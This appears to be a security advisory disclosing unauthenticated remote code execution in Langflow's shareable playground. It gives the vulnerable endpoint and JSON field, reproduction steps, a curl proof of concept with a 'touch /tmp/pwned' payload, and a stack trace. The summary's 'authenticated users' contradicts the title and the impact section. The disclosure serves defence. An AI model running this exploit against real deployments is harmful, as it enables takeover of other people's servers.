Langflow: Unauthenticated RCE in Shareable Playgrounds
Summary
The "Shareable Playground" (or "Public Flows" in code) contains a critical RCE vulnerability. Simply sharing a flow exposes the deployment to RCE risk by authenticated users.
Tested on commit 2d67402b1dbaefcbce85a244d4a6cd5e4bda1cfe
Details
Shareable Playground feature works by enabling the execution of workflows by unauthenticated users, by accessing a link.
Specifically, it enables the route /api/v1/build_public_tmp to execute any public flow, given a public flow ID.
When the route executes the flow, it allows for providing arbitrary custom Python code as the nodes code, inside the JSON payload!
The vulnerable field is data.nodes[X].data.node.template.code.value. See PoC for an example.
PoC
Reproduction:
- Create a new flow and add a Chat Input node to it
- Share the flow ("Shareable Playground")
- Access the public link with the browser developers tools open and execute the flow.
- Find the
/api/v1/build_public_tmproute and copy as cURL - Edit the
data.nodes[X].data.node.template.code.valueJSON field with any python code and run the cURL command.
Example PoC (replace flow ID with the correct one), and download test_with_python.json:
curl 'http://localhost:7860/api/v1/build_public_tmp//flow?start_component_id=ChatInput-syEJp&log_builds=false&event_delivery=streaming' \
-H 'Content-Type: application/json' \
-b 'client_id=anything' \
--data-raw "$(cat test_with_python.json)"
Search for touch /tmp/pwned in the test_with_python.json and edit for any other code.
The stacktrace for the code executed is:
...
File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py", line 495, in generate_flow_events
ids, vertices_to_run, graph = await build_graph_and_get_order()
File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py", line 234, in build_graph_and_get_order
graph = await create_graph(fresh_session, flow_id_str, flow_name)
File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py", line 298, in create_graph
return await build_graph_from_data(
File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/utils/core.py", line 192, in build_graph_from_data
graph = Graph.from_payload(payload, str_flow_id, flow_name, kwargs.get("user_id"))
File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 1153, in from_payload
graph.add_nodes_and_edges(vertices, edges)
File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 270, in add_nodes_and_edges
self.initialize()
File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 512, in initialize
self._build_graph()
File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 1305, in _build_graph
self._instantiate_components_in_vertices()
File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 1347, in _instantiate_components_in_vertices
vertex.instantiate_component(self.user_id)
File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/vertex/base.py", line 382, in instantiate_component
self.custom_component, _ = initialize.loading.instantiate_class(
File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/interface/initialize/loading.py", line 45, in instantiate_class
custom_component: CustomComponent | Component = class_object(
File "", line 59, in __init__
Impact
Unauthenticated RCE on any deployment with a shareable playground.
Ori Lahav Security Researcher @ Rubrik Inc.